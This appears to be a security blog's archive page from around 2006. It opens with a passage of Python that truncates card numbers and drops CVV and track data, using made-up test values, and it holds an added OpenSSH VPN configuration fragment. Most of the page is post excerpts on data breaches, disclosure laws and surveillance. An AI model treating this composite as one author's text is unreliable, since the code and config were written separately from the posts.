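SENSITIVE_AUTH_FIELDS = frozenset({"cvv", "track1", "track2", "pin_block"})


def mask_pan(pan):
    """Truncate a PAN to the first six and last four digits.

    A merchant that does not need the full number (no recurring billing,
    no chargeback research beyond the last four) keeps only this form, which
    removes the incentive to steal the table in the first place.
    """
    digits = "".join(ch for ch in pan if ch.isdigit())
    if not 13 <= len(digits) <= 19:
        raise ValueError("PAN length out of range")
    return digits[:6] + "X" * (len(digits) - 10) + digits[-4:]


def storable_record(auth_response, now):
    """Return the only record that is written to durable storage.

    Everything in SENSITIVE_AUTH_FIELDS is dropped, the PAN is truncated, and a
    timestamp is attached so the retention policy can be enforced later.
    """
    record = {k: v for k, v in auth_response.items()
              if k not in SENSITIVE_AUTH_FIELDS}
    record["pan"] = mask_pan(auth_response["pan"])
    record["stored_at"] = now
    return record


def purge_expired(records, now, retention_days):
    """Apply the retention policy: keep records younger than the limit,
    return (kept_records, number_purged)."""
    cutoff = now - timedelta(days=retention_days)
    kept = [r for r in records if r["stored_at"] >= cutoff]
    return kept, len(records) - len(kept)


def run_example():
    """Constructed sample data: one fresh authorization and one stale record."""
    now = datetime(2006, 2, 20, 12, 0, 0)
    auth = {
        "pan": "4111 1111 1111 1111",          # constructed test PAN
        "expiry": "0308",
        "cvv": "123",                           # must not survive authorization
        "track2": "4111111111111111=0308101",  # must not survive authorization
        "auth_code": "A1B2C3",
        "amount": "42.00",
    }
    fresh = storable_record(auth, now)
    stale = dict(fresh, stored_at=now - timedelta(days=400))
    kept, purged = purge_expired([fresh, stale], now, retention_days=365)
    return fresh, len(kept), purged


if __name__ == "__main__":
    record, kept, purged = run_example()
    print(record)
    print("kept", kept, "purged", purged)
```

The retention period and the decision to truncate rather than encrypt are policy inputs; the point of wiring them into code is that the storage layer cannot accidentally keep a CVV because a developer logged the whole response.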

 

Here's a name: Wal-Mart

Via lyger of the Dataloss mailing list, I learned of an article claiming that Wal-Mart may be the big-box retailer involved in several high-profile card reissues stemming from a breach which led to an international series of card frauds. In what appears to be a widening incident, Bank of America, MasterCard and Visa all announced […]

 

The Wallet Game

At lunch after Shmoocon, Nick Mathewson said he’d like to pay something between zero and the amount of money in his wallet. I think this suggests a fascinating game, which is that Alice asks Bob for some amount of money. If Bob has that much money in his wallet, he pays. Otherwise, Alice pays him […]

 

SarBox and Breaches

Earlier today Chris wrote (“Naming names isn’t always bad“): A quick aside to optionsScalper, since you mentioned a firm’s duty to shareholders: when it comes to thinking about breach notices, I think about the efficient markets hypothesis, and whether investors might rationally think that failure to protect data might impact future profitability. Bugger efficient markets! […]

 

Crispier Breach Disclosure (Cooks Illustrated, unknown # CCs)

A good breach disclosure fills you up with what happened, how, and what the company is doing for you. But too often, such notices are soggy and imprecise. Want more precision in the recipe? Beefier response? Cooks Illustrated set out to see what could be done, in “What Happened To Your Website.” Unfortunately, the disclosure […]

 

Naming names isn't always bad

In a comment to an earlier blog entry concerning a ‘he who must not be named’ policy for card processors and others who get breached , optionsScalper asks “given Adam’s recent series on “Disclosure” (at least five posts back to the BofA post on 1/21/2006), how do you (or Adam) assess the disclosure in this […]

 

Hasta La Vista Secure Flight

As mentioned on Freedom To Tinker and by Lauren Gelman, at the Center for Internet and Society, the TSA has mothballed its plans to deploy Secure Flight. Though the TSA will surely come up with something else, this is definitely a step in the right direction.

 

On Treatment of Prisoners and the Face of Evil

Establishing villainy is hard work. Too little, and your villains seem pathetic. Too much, and they’re over the top. Even drawing deeply on Joseph Campbell and with the music of John Williams, Lucas still needs actions to show that Darth Vader is the embodiment of evil. What does he choose? The first time we see […]

 

Selling Your Phone Records

Buried in your wireline and wireless telephone subscriber agreement is a notice concerning “customer proprietary network information” (CPNI). CPNI is your calling records. CPNI shows the phone numbers you called and received and for how long you talked. Privacy Rights Clearing House has a guide to “opting out of CPNI sharing.” This is great, because […]

 

Ka-Ping Yee on Phishing

In “How to Manage Passwords and Prevent Phishing,” Ping writes: So, right up front, here is the key property of this proposal: using it is more convenient than not using it. This property makes this proposal unique (as far as I am aware). All the other proposals I have seen require the user, on each […]

 

Brigham and Women's Hospital, 60 Medical Records, Fax Errors

For the past six months, Brigham and Women’s Hospital in Boston has been accidentally faxing the confidential medical records of women who’d recently given birth to a Boston investment bank, regardless of the bank’s repeated attempts to stop them, the Boston Herald reports. (via CSO Online.) (and) The records, called inpatient admission sheets, contain a […]

 

City of Washington DC, 190,000 SSNs, Willful Ignorance of Federal Law

Although Washington, DC routinely capitalizes on the strictest interpretation of its own traffic laws, the federal city has found itself in violation of a federal law intended to protect drivers from identity theft. Since December it has been illegal to display Social Security numbers on driver’s licenses, yet the District Department of Motor Vehicles continues […]

 

Blue Cross of North Carolina, 629 SSNs, "Human Error"

A “human error” at Blue Cross and Blue Shield of North Carolina allowed the Social Security numbers of more than 600 members to be printed on the mailing labels of envelopes sent to them with information about a new insurance plan. (“Computerworld“)

 

That's gotta sting

This administration reacts to anyone who questions this illegal program by saying that those of us who demand the truth and stand up for our rights and freedoms somehow have a pre-9/11 world view. In fact, the President has a pre-1776 world view. Our government has three branches, not one. And no one, not even […]

 

Is That Legal?

In comments on Chris’s post “Nations Bank, 100,000 credit cards, breach at unnamed(!) processor,” OptionsScalper asks: It is amazing that the unnamed processor remains unnamed (or do I misunderstand?). I think the risk to customers at this bank has not been reduced, i.e. card replacement is ineffective. How does one even go about measuring whether […]

 

Nations Regions Bank, 100,000 credit cards, breach at unnamed(!) processor

From Indychannel.com: Regions Bank is canceling the credit cards of 100,000 of its customers in 15 states — including Indiana — saying a separate company put their credit information at risk. Regions said the security breach involves a company that processes credit and debit cards nationwide. The bank, which says it was not responsible for […]

 

It Depends What The Meaning of "Credit Report" Is

Bob Sullivan has a must-read article “Her ATM card, but her impostor’s picture” about a woman whose SSN is being used by someone else: For years, Margaret Harrison believed she had an impostor. There were signs her Social Security number was living a double life. Four years ago, an unemployment office in West Virginia almost […]

 

Tools and Secure Code

Mike Howard (and company) have a great post about why “Code Scanning Tools Do Not Make Software Secure:” Such tools, often called static analysis tools, such as the tools we have included in Visual Studio 2005, are very useful, but they are no replacement for human intellect. If a developer does not know how to […]

 

New OpenSSH, with nifty feature

OpenSSH 4.3 is out. It has one new feature: Add support for tunneling arbitrary network packets over a connection between an OpenSSH client and server via tun(4) virtual network interfaces. This allows the use of OpenSSH (4.3+) to create a true VPN between the client and server providing real network connectivity at layer 2 or […]
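For anyone who wants to try the feature, the pieces fit together as follows. This is an added configuration fragment drawn from the ssh(1) and sshd_config(5) documentation for that release, not from the post; the host name and addresses are placeholders.

```text
# Server side (sshd_config). Tunnel forwarding is off by default; allow only
# layer-3 tun devices rather than "yes", which also permits layer-2 (tap).
PermitTunnel point-to-point

# Optionally pin the key to one tunnel device in authorized_keys so that a
# compromised client key cannot request an arbitrary device or a shell:
tunnel="0",command="true" ssh-rsa AAAA... vpn-client

# Client side: -w local_tun:remote_tun requests tun0 on both ends; -f goes to
# the background once authenticated, -N runs no remote command.
ssh -f -N -w 0:0 root@server.example

# Then give each end of the point-to-point link an address (a /30 here).
# client:   ifconfig tun0 10.1.2.1 10.1.2.2 netmask 255.255.255.252
# server:   ifconfig tun0 10.1.2.2 10.1.2.1 netmask 255.255.255.252
```

Opening a tun device needs root on both hosts, which is why the authorized_keys restriction matters: the key that builds the VPN should be able to do nothing else.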

 

Disclosure Laws, Redux

In responding to Lyal Collins’ comment on my “Disclosure Laws” post, I went and read the Rhode Island Identity Theft Protection act of 2005 (H6191). A couple of things occurred to me. First, the National Conference of State Legislatures has a great list of Security Breach Legislation. Second, and perhaps more important, I don’t see […]

 

Disclosure Laws

In an article (“Credit card numbers reported stolen from R.I. state Web site“) about the Rhode Island breach, I found the following quotes: The breach on Dec. 28 was detected during a routine security audit and reported to the state government the following day, Loring said. At the time, the company believed only eight credit […]

 

Responding to Terror

Once I was loose on the streets of the city, I continued to be impressed with what I saw. Spain is definitely no stranger to terrorism. They suffered the Madrid bombings just over 18 months ago and have been living with the current form of the ongoing sometimes-violent Basque Separatist movement since 1968. Somehow, though, […]

 

An unethical strategy?

Voting is a means of aggregating individual preferences in order to obtain a collective choice from a set of potential outcomes. Arrow notwithstanding, various voting schemes are often used for very important decisions. Voting is also used to select the winner of the Guy Toph Award, in Hillsborough County, Florida. In this case, the voters […]

 

Sports Authority in another Point-of-Sale data retention SNAFU?

I posted this to the Dataloss list earlier today. Sports Authority Inc. confirmed this week that it recently launched an investigation into its information system after four international banks alerted it to a potential intrusion into its network in December. With help from the Secret Service and Cybertrust Inc., the sporting goods company determined that […]

 

The Art of Shmoozing

Guy Kawasaki has a great post up on “The Art of Schmoozing.” It’s full of great advice. So read it, and let me know, what can we do to make this blog more useful to you?

 

Swire on Disclosure, Redux

Following on Chris’s post on disclosure, I’ve been meaning to mention Peter Swire’s “A Theory of Disclosure for Security and Competitive Reasons: Open Source, Proprietary Software, and Government Agencies:” A previous article proposed a model for when disclosure helps or hurts security, and provided reasons why computer security is often different in this respect than […]

 

The following is not to be construed as legal advice. Or anything else.

The acronym “IANAL” is no doubt familiar to anyone reading these words. Well, I Am Not A Lawyer, but Paul Rianda is, and he wrote an interesting article for Transaction World’s September 2005 issue, that I happened to run across. In it, Mr. Rianda, esq., discusses his view of why the breaches we are all […]

 

Without Surveillance, We'd Have Anarchy In The Streets

The New York Times reports that “Police Officers Sue Over Police Surveillance of Their Protests.” Previously in the New York Police Department department, we offered a look back at the “The New York City Police Riots,” which, if you think about it, indicates that New York City Police, unlike most of the unarmed demonstrators in […]

 

Redaction Is Harder Than Public Speaking

Did you ever have one of those days where you had a great, totally unfair pot shot to sling at Microsoft, and events just overtake your plans? It started out when I watched the videos of “Blue Hat 2005 – Security Researchers come to MS, Part I.” Now, I have some insight into the training […]

 

Dataloss Mail List

In what has become a near weekly occurrence, large companies are collecting your personal information (sometimes without your knowledge or consent), and subsequently letting it fall into the hands of the bad guys. This is your personal information; name, address, social security number, credit card number, bank account numbers, and more. Data Loss is a […]

 

University of Colorado at Colorado Springs, 2500 employees, SSNs, "virus"

Looks like a worm hit a personnel department PC. From the Colorado Springs Gazette: Personal information on about 2,500 current and former employees at the University of Colorado at Colorado Springs has been compromised by someone who hacked into a computer and infected it with a virus. Names, Social Security numbers, birth dates and addresses […]

 

Breach disclosure insurance

A common argument used against state-level breach notification laws, and in favor of federal legislation overriding state laws, is that existence of these numerous state laws with their differing requirements and conditions raises the cost of compliance unacceptably. Just to be prepared to comply with potentially fifty distinct notification regimes, a firm would need to […]

 

Somebody's Watching Me

Don’t miss the awesome video of Somebody’s Watching Me from Progress Now Action. (Dear Sama: Thanks!)

 
 
 

"Contrasts in presentation style"

“Contrasts in presentation style: Yoda vs. Darth Vader” is brilliant! How can I not love a mash-up of what you do and Star Wars?

 

TSA Records

Back in August (“Demand Your records”) I mentioned the effort to request, under the Freedom of Information Act, records relating to the TSA’s illegal data grab on Americans. In December, I got a response, and share a redacted copy here. All redactions are mine. (The whole process of redaction is remarkably difficult, but that’s a […]

 

Workshop on the Economics of Securing the Information Infrastructure

The Workshop on the Economics of Securing the Information Infrastructure, October 23-24, 2006, Arlington, VA (submissions due: August 6, 2006, 11:59PM PST) has just been announced. There’s a great topics list, and a great list for the program committee. It should be quite the workshop.

 

New Passports More Secure than Wet Paper Bags (Barely)

Remember the US Government plan to put a radio chip in your passport? The one whose security has never been seriously studied, whose justification seemed to boil down to a hope that it would speed processing, but even that was wrong? The one whose security gets worse every time anyone competent looks at it? Well, […]

 

On Disclosure

In comments on “Bank of America Customers Under Attack,” Options Scalper writes: I’m uncertain of the “mandatory disclosure” that you discuss here. If by this you mean of data lost in transactions similar to what you mention above, I agree. But if you mean data from the call center to determine the level of theft/fraud […]

 

Musings on The Future of the State

I love the little corners of the law that are ancient rights and privileges. They illustrate ways in which our institutions have evolved, and from where they came, we can learn much about where they may go. That’s why I was delighted to read “Russian-Israeli who Left Newfoundland and Labrador Church Sanctuary Is Deported.” Church […]

 

Newspeak Alert

Dear San Jose Mercury News, In re your article, “Date set for hearing on Google data-sharing.” It’s not sharing when you’re holding a court hearing. It’s a demand. I share my toys with my friends. The man with a gun demanded my wallet. Please make a note of it. PS: If you didn’t promulgate the […]

 

Langley, British Columbia, Canada, 1,000 medical records, courier firm

There are calls for tougher guidelines in the handling of private information after 1,000 medical files went missing when a courier car was stolen in Langley on Thursday. The courier company says the driver left the car running for less than a minute. When the car was stolen, so was a box of health records […]

 

State of Rhode Island, 4,118 or 53,000 CC, Hacker

Thousands of credit card numbers were stolen from a state government Web site that allows residents to register their cars and buy state permits, authorities said Friday. The private company that runs http://www.ri.gov said that 4,118 credit card numbers had probably been taken, a state official said. All online transactions were suspended Friday until any […]

 

Octopus vs. Submarine

Rare video footage shows a giant octopus attacking a small submarine off the west coast of Vancouver Island. Salmon researchers working on the Brooks Peninsula were shocked last November when an octopus attacked their expensive and sensitive equipment. The giant Pacific octopus weighs about 45 kilograms, powerful enough to damage Mike Wood’s remote-controlled submarine. From […]

 

Providence Home Services, 365,000 medical records, Car Thief

About 365,000 hospice and home health care patients in Oregon and Washington are being notified about the theft of computer backup data disks and tapes late last month that included personal information and confidential medical records…In an announcement yesterday, Providence Home Services, a division of Seattle-based Providence Health Systems, said the records and other data […]

 

Providence Home Services, 365,000 people, health records, theft from employee vehicle

From Computerworld (via Slashdot) we learn that a home health care business deliberately sent patient info home with an employee as part of their disaster recovery plan. I’m serious. Now, unless this guy lives under Cheyenne Mountain, I’m saying that’s a dumb plan. Anyhoo, some of the information was encrypted, but much of it was […]

 

Choicepoint to Pay $15M Fine

Atlanta-based data aggregator ChoicePoint today agreed to pay $15 million to settle charges that it violated federal consumer protection laws when it allowed criminals to purchase sensitive financial and personal data on at least 163,000 Americans. The settlement addresses a pair of lawsuits filed against ChoicePoint by the Federal Trade Commission and represents the largest […]

 

Ameriprise, 230,000 SSNs, Stolen Laptop

On Wednesday, Ameriprise Financial, an investment advisor firm, said that a company laptop stolen from an employee’s parked car in December contained the personal information of some 230,000 customers and company advisors, The New York Times reports. The sensitive information contained in the laptop included the names and Social Security numbers of roughly 70,000 current […]

 

Introducing Debix

I’m at Black Hat Federal this week, helping introduce Debix. Of all the systems that I’ve heard about to combat identity theft, Debix’s stands far above the crowd, which is why I’ve joined their advisory board: In the physical world, we have the ability to place locks on everything from cars to safety deposit boxes […]

 

UDel breach twofer

The University of Delaware “UDaily” reports on two breaches: [A] computer in the School of Urban Affairs and Public Policy was attacked sometime between Nov. 22-26 by an unknown hacker, and it contained a portion of a database that included Social Security numbers for 159 graduate students. […] A back-up hard drive was stolen from […]

 
 

From the Do As We Say Dept.

Everyone knows that the Motion Picture Association of America is very much against unauthorized copying of movies. Then why is the MPAA admitting that it copied a movie, when it was specifically told not to by the copyright owner. The movie in question is Kirby Dick’s This Film Is Not Yet Rated. According to the […]

 

Various Oregon credit unions, debit cards, organized fraud ring?

This one seems to have slipped below the radar. From the January 25 Corvallis, Oregon Gazette-Times: Fair Isaac Corp., a Minnesota-based data security provider, late last week alerted the OSU Federal Credit Union, Citizens Bank, Benton County Schools Credit Union and Central Willamette Community Credit Union that customer debit cards bearing the Visa imprint may […]

 

NSA Wiretaps: General Hayden Speaks

In “Hayden Delivers Impassioned Defense of NSA,” Powerline excerpts Hayden’s Speech to the National Press Club (PDF). One section that jumped out at me was: GEN. HAYDEN: You know, we’ve had this question asked several times. Public discussion of how we determine al Qaeda intentions, I just — I can’t see how that can do […]

 

Two On Vulnerability Disclosure

Ed Moyle has a very good post, “Inside Oracle’s Patch Kimono,” in which he compares Oracle’s process for working with vulnerability researchers with that of Microsoft. I’d like to add two really small bits: First, I’d have compared to the (MS-dominated) Organization for Internet Safety, and second, all of these put insufficient value on secondary […]

 

Notre Dame, SSNs+CC#s+Check Images, hacker

Not much detail on this one, but it looks like a box used for fundraising purposes got 0wned. The intrusion was detected by “security software” on January 13, but the intrusion itself is said to have occurred between November 22 and January 12. [I guess they run Tripwire monthly ;^)]. Information potentially obtained by the […]

 

Lockpick Business Card

A hacker, entrepreneur, and all around mischief maker, Melvin wanted something he could give to peers and prospective clients that spoke of this nature. Talk about a card that opens doors! Via Boingboing.

 

Investing in Identity Theft: The Job Fair

For Aisha Shahid and dozens of others who went to an advertised job fair in Chattanooga and got offers of nightclub work in Atlanta, Memphis and Miami, the “dream jobs” turned out to be an identity theft scam. A man who identified himself as record company and music group president William Devon took applications and […]

 

University of Kansas, 9,200 SSNs, IT Department

[Update: Fixed headline, thanks to anonymous.] Students who applied via the online application put out by the Department of Student Housing were alerted through either an e-mail or a letter that their private information might have been exposed. According to a University Relations news release, a computer file with names, addresses, birth dates, phone […]

 

CodeCon 2006

The program for CodeCon 2006 has been announced. CodeCon is the premier showcase of innovative software projects. It is a workshop for developers of real-world applications with working code and active development projects. All presentations will be given by one of the lead developers, and accompanied by a functional demo. Early registration ends Jan 31.

 

The Trouble With Illicit

[Update: I meant to tie this more closely to “Illicit” book review, because I think this illustrates those hard choices.] There’s some fascinating competing legal goals on display in the Washington Post story “Area Police Try to Combat a Proliferation of Brothels:” “Sometimes it takes five or six interviews to break these girls [sic], to […]

 

Bank of America Customers Under Attack

The Seattle Post Intelligencer has a story, “B of A Customers Hit By Thefts,” about cash withdrawals being made overseas: According to customer service representatives at Bank of America, there have been numerous reports of checking account fraud in Seattle, but many more incidents being reported from other states. The increases in fraud reports are generally […]

 

Pro-User Zealot!

Get the bumper sticker! The background is that a Canadian MP, Sam Bulte, referred to people other than her film and music business corporate backers as “pro-user zealots” at an all candidates meeting. (Michael Geist has a good summary in “The Bulte Video,” Boingboing has covered it extensively, and Technorati can help you find lots […]

 

Happy Birthday, CVE!

The sixth presentation was based on a paper titled “Towards a Common Enumeration of Vulnerabilities” by David E. Mann and Steven M. Christey from the MITRE Corporation. This presentation also generated considerable interest from the audience. They tackled the problem of dealing with several heterogeneous vulnerability databases and presented the Common Vulnerability Enumeration (CVE) mechanism […]

 

What Software Do I Like?

In a comment on “Software Usability Thoughts: Some Advice For Movable Type,” Beau Smith asks “What Mac software do you like?” That’s a tough question for three reasons: First, there’s enough decent software (consistent, attractive, discoverable) that the bad stuff can generally be avoided. Secondly, I’d like to choose examples which are either free or […]

 

UK various breaches

Department of Work and Pensions, 8,800 identities Her Majesty’s Revenue and Customs (HMRC) was forced to close down the tax credits website at the start of December last year, after a spate of fraudulent claims came to light which exploited the stolen identities of Department for Work and Pensions staff. Network Rail, 4,000 identities Primarolo […]

 

Do no evil

As readers of this blog probably are already aware, Google has been subpoenaed. The United States government is demanding, in part, that they provide a list of all URLs they index. This is something I’d expect them, or any other search firm, to want to keep secret. Imagine my surprise when I read this in […]

 
 

Reacting to Web Pages

Researchers led by Dr. Gitte Lindgaard at Carleton University in Ontario wanted to find out how fast people formed first impressions. They tested users by flashing web pages for 500 msec and 50 msec onto the screen, and had participants rate the pages on various scales. The results at both time intervals were consistent between […]

 

More on "A Ping" Privacy Invasion

Before I’d had much in the way of coffee, I thought that the “Firefox Ping URLs” might offer a way to scan the web for sites to avoid. It would be simple. For each site mentioned in a ping URL, add it to a blacklist. The trouble with this is that the same set of […]

 

Firefox Ping URLs

It’s all over the internet that Mozilla has added a “ping” attribute to URLs: I’ve been meaning to blog about a new web platform feature that we’ve added to trunk builds of Firefox. It is now possible to define a ping attribute on anchor and area tags. When a user follows a link via one […]

 

Known unknowns?

Oracle has just released fixes for 82 vulnerabilities. After taking several paragraphs to say “Many experts external to Oracle feel that patches for critical vulnerabilities are too slow in coming from the esteemed database giant, and have criticized the company for its slowness in responding to reports originating with outsiders”, Brian Krebs notes that security […]

 

BSD Kernel Stack Overflow

An integer overflow in the handling of corrupt IEEE 802.11 beacon or probe response frames when scanning for existing wireless networks can result in the frame overflowing a buffer. From the FreeBSD Advisory. Researcher advisory is at Signedness.org. No word yet on if Macs are vulnerable. I think Richard at TaoSecurity sums it up well: […]

 

Brokerage account zero liability

E*Trade is implementing a program under which it will reimburse on-line fraud victims for their losses, according to a New York Times report. This is an interesting step. Now the question is whether investors who prefer to use their pet’s name as a password will shift their accounts to E*Trade :^)

 

On the NSA Wiretaps

One of the noteworthy aspects to the ‘NSA Wiretap’ revelations is how it has galvanized a broad swath of people, far beyond the “usual suspects” to state that the program was a mistake, and we need to function within the rule of law. For example, Suzanne Spaulding, former assistant general counsel at the CIA: Before […]

 

Dear Recruiter

Hi, My name is () and I am a recruiter for (). I came across your name on an internet search and wanted to tell you about our opportunities available within our NYC and Houston locations. (), a key component of the firm’s () practice, provides the building blocks for a secure and protected business […]

 

Roll Clouds

These rare long clouds may form near advancing cold fronts. In particular, a downdraft from an advancing storm front can cause moist warm air to rise, cool below its dew point, and so form a cloud. When this happens uniformly along an extended front, a roll cloud may form. Image and text from “Astronomy Picture […]

 

Russell Tice and NSA Wiretaps

Democracy Now has a radio interview, downloadable in several formats, and a transcript at “National Security Agency Whistleblower Warns Domestic Spying Program Is Sign the U.S. is Decaying Into a “Police State.” Reason’s Julian Sanchez has an interview “Inside The Puzzle Palace:” REASON: You’re referring to what James Risen calls “The Program,” the NSA wiretaps […]

 

The Remittor and the Money Launderer

Ethan Zuckerman has a great post about the practicalities of international workers sending money ‘home,’ “Remittance – the big business of sending money home:” It’s difficult to overstate the importance of remittance income to most African nations and many developing nations. Nworah cites a figure of $300 billion dollars sent from diasporas to developing nations […]

 

Hotel Room Keys

For example, last fall, an IT director at a travel club in Wyomissing, Pa., told Computerworld that he had found personal information on magnetic hotel key cards when visiting three major hotel chains. The IT professional said he read the cards using a commonly available ISO-standard swipe-card reader that plugs into any USB port. At […]

 

Liberty Breeds Security

Another method, says Princeton University economist Alan B. Krueger, is to increase the civil liberties of the countries that breed terrorist groups. In an analysis of State Department data on terrorism, Krueger discovered that “countries like Saudi Arabia and Bahrain, which have spawned relatively many terrorists, are economically well off yet lacking in civil liberties. […]

 

Illinois Department of Human Services, client names and SSNs, misconfigured voicemail

“To leave a message, press ‘1234’ and listen to confidential client voicemail containing SSNs and other identifying information”. The compromised information dated back to mid-November 2005. Additional details at the Belleville News-Democrat, which notes that this is a repeat offender — the same office left unshredded confidential documents in a trash bin until the paper […]

 

Real ID Even More Expensive Than Predicted

Bruce Schneier links to an AP article about the hideous costs of the RealID Act. Early estimates were for $120 million, current estimates are for $300 million for the first year alone, and that’s just for three states, Pennsylvania, Virginia and Washington state. So we can safely say that nationally we’re looking at billions of […]

 

Quicktime WMF like Vulns on OSX and Windows

The folks at eEye and Fortinet have identified a variety of image based heap overflows that allow for arbitrary code execution on both OSX and on Windows. Also an article on news.com.com claims that the patch initially caused some issues for some users on both platforms, that have been addressed now. Seems that poor implementation […]

 

Steve Jobs and Presentations

Public speaking is an art, but like every art it depends not only on innate talent, but also on mastery of a set of technical skills which empower the artist to share their vision with an audience in a compelling way. Presentations by Steve Jobs are unique, not within the computer industry, but across business. […]

 

More Victims of Money Laundering Regulations

In a comment on “Atlantis Resort (Bahamas) 50,000, Hacker,” Ian Grigg explains that the reason Bahamas Casinos collected 55,000 SSNs is that the various and sundry “anti-money laundering” regulations force them to, or be labeled “naughty.” Err, ‘non-compliant.’ How’s that for NewSpeak? There’s a pretty large steamroller behind such rules and regulations, and the push […]

 

People's Bank of Connecticut, 90,000 SSNs, UPS & TransUnion

A computer tape from a Connecticut bank containing personal data on 90,000 customers was lost in transit recently, the bank reported today. People’s Bank, based in Bridgeport, Connecticut, is sending letters to the affected customers, it said in a statement. The tape contains information such as names, addresses, Social Security numbers and checking account numbers. […]

 

Friendster this ain't!

When you’re facing hard time, and the chips are down, you need to hunker down and dig up all the dirt you can on the stool pigeon who fingered you. That’s where whosarat.com comes in: Who’s A Rat is a database driven website designed to assist attorneys and criminal defendants with few resources. The purpose […]

 

ToggleBth

At the Windows Mobile team blog, Mike Calligaro releases a bunch of cool freeware, including a simple Bluetooth toggler. This will make demo’ing the Smurf Bluetooth logger sooo much easier. Thanks Mike!

 

Bug Scrubs and Learning From Mistakes

There’s a story at CNet, “Microsoft to hunt for new species of Windows bug:” Microsoft plans to scour its code to look for flaws similar to a recent serious Windows bug and to update its development practices to prevent similar problems in future products. Now, it’s easy to kick Microsoft for not having perfect code, […]

 

Adam's Email Troubles

This morning I got two different emails saying something like “I need an answer to that question.” Trouble is, I hadn’t seen the original emails. If you’ve sent me email lately, and not heard back, please resend it. I’m trying to respond to every email within 24 hours so I can get a clean inbox. […]

 
 

Atlantis Resort (Bahamas) 50,000, Hacker

Customers of the Atlantis resort in the Bahamas have reason to worry this week, as over 50,000 identities have been taken from the hotel’s database. The information was revealed in a document submitted to the Bahamas Securities and Exchange Commission. The information includes typical information such as names, addresses and credit card details, but also […]

 

Winnebago County (IL), Several SSNs, Winnebago County Clerk

ROCKFORD, Ill. – The Winnebago County Clerk is apologizing for releasing a list of election officials that included Social Security numbers. County Clerk Dave Johnson said an employee forgot to blacken out the numbers before giving the list of Democratic election judges to county clerk candidate Jeff Polsean. The Illinois Freedom of Information Act exempts […]

 

Brain fingerprint clears prisoner

Wow. An innocent man has been freed based upon his “brain fingerprint”. This happened over a year ago, but hey, I’ve been busy. The murder conviction of an Iowa man was overturned last year by that state’s highest court on the basis of a new technique called “brain fingerprinting”. Terry Harrington had served more than […]

 

SubDomain GPL'd

AppArmor, the security tool formerly known as SubDomain, has been released under the GPL by Novell. See the Apparmor FAQ or the CNET story, “Novell delivers security shield for Linux computers.” If you need another layer of resilience for your Linux systems, take a look.

 

Device ID and Privacy

Unique, hardcoded device IDs are bad for privacy. We hate them. Our friends hate them. So it’s nice to see that Microsoft is making it harder to get to them: GetDeviceUniqueID attempts to address these issues and to reduce applications’ dependency on the precious device id. Firstly GetDeviceUniqueID can be called from the trusted or […]

 

RFID Zapper

I’ve been mulling over John Robb’s description of the (very cool) RFID zapper the Chaos Computer Club demoed at their conference. He calls them “the German branch (privacy activists) of the global guerrilla innovation network.” He also states that “In order to correctly route and track items from inception to purchase, these chips are attached […]

 

Anonymous Blogging Wiki!

The Blog Safer Wiki was announced by the Spirit of America’s Anonymous Blogging project. There’s a lot of technology know how, and a lot of cultural issues that go into this, and Curt is doing a great job at bringing the technical knowledge to those who need it, and helping them help each other: Spirit […]

 

Google's Video "Store"

Justin Mason has some thoughts in “Google DRM and WON Authentication:” That’s interesting. In my opinion, given that quote, I’ll bet Google’s DRM is something similar to the copy-protection systems used for many games since about id’s Quake 3 and Valve’s Half-Life; an online “key server” which validates codes, tracks player IDs, and who’s viewing […]

 

"High Assurance" Certificates

Following up on previous posts on the concept of high assurance certificates (“Web Certificate Economics“), I’d like to draw attention to a CSOOnline blog post, “Phishers Now Targetting SSL:” The spoofing has taken a number of forms, which appear to be becoming highly sophisticated. They vary from exploiting browser flaws, to hacking legitimate sites or […]

 
 

Mobile Phones, Modernity, and Stress

The study, which followed more than 1,300 adults over 2 years, found that those who consistently used a mobile phone or pager throughout the study period were more likely to report negative “spillover” between work and home life — and, in turn, less satisfaction with their family life. From “Cell phones tied to family tension,” […]

 

On Grammar

I have friends who believe that grammar is handed down from on high, either by Safire, or Strunk and White, or some are strange adherents of something they call ‘Chicago.’ One of them even argues that the rules of grammar are not subject to evolution. Which is odd, given that we’re speaking really bad French, […]

 

EPIC West

I realized today that Chris Hoofnagle’s blog at EPIC West wasn’t on my blogroll. He’s had lots of important posts up lately, from the informational (“ CA OPP: 13 New Privacy Laws in Effect“) to the amusingly disgusting (“Pretexting Isn’t Lying, According to Bestpeoplesearch.com“) California’s Office of Privacy Protection just released an announcement that 13 […]

 

How to Blog for Your Company

Here at SiteAdvisor, we strongly believe in the importance of this feature. But we admit that so far we’ve done a mediocre job explaining our motivation and our initial implementation. So writes Chris Dixon in “The Role of Affiliates in Spyware, Adware, and Spam.” Chris is using the Siteadvisor blog as an extended discussion of […]

 

Beautiful Evidence, by Edward Tufte

After 9 years, I have completed Beautiful Evidence, except for the index and a few loose ends. We are currently proofing some difficult images on press, negotiating with printers, planning the order for paper and binding, and working through other production issues. Probably the major threats to breaking the schedule will be in color-correcting images […]

 

Privacy Competition in Politics

Two leading governor candidates are trying to outdo each other in protecting Minnesotans’ privacy…The candidates’ dueling news conferences produced more politics than policy, with each charging the other with not doing enough to protect citizens’ privacy. From “Governor is seeking privacy law changes.” I don’t like some of the proposals. It seems to me that […]

 

Brilliant Evil Redux

Following up with further conspiracy theory on Adam’s post, I also have to wonder just how accidental it was that a properly cryptographically signed version of the patch for WinXP was “posted to a community site” yesterday. Given the pressure to quickly produce a patch combined with the one produced by Ilfak Guilfanov, it wouldn’t […]

 

WMF Patch Timing: Brilliantly Evil?

If you’ve followed the “WMF Vulnerability” that’s been all over the security blogosphere, with leaks into the mainstream media, then you know that today Microsoft released a patch. (If you don’t know this, please just go run Windows update.) I haven’t talked about it because I haven’t had much to add, but today’s release of […]

 

Microsoft, China, and Cultural Imperialism

Rebecca MacKinnon has a post on Microsoft’s removal of a blog, run by Michael Anti from their MSN Spaces blog site. (“Why Microsoft censorship in China matters to everybody.”) I’m finding the justifications and responses (both official and unofficial) to be fascinating and ultimately confusing. Matt Marshall at SiliconBeat has “Microsoft and Bokee mired in […]

 

Two Quick Notes

I’d like to remind everyone that Emergent Chaos now has three people posting, not just Adam. I see comments and links that assume I’m writing everything here, which is a little demeaning to Chris and Arthur. Also, I’d like to remind people that I maintain del.icio.us bookmarks of things I find interesting, but don’t have […]

 

The Machinery of Repression

The New York Times reports on the completion of the first phase of the treat-visitors-like-criminals US-Visit system. The article is informative, and tells us: The fingerprint check at the borders has turned up just 970 hits of visa violators or criminal suspects. The total rises to about 15,000 with inclusion of the cases identified overseas […]

 

Thoughts on Farris Hassan, the 'Iraq Teenager'

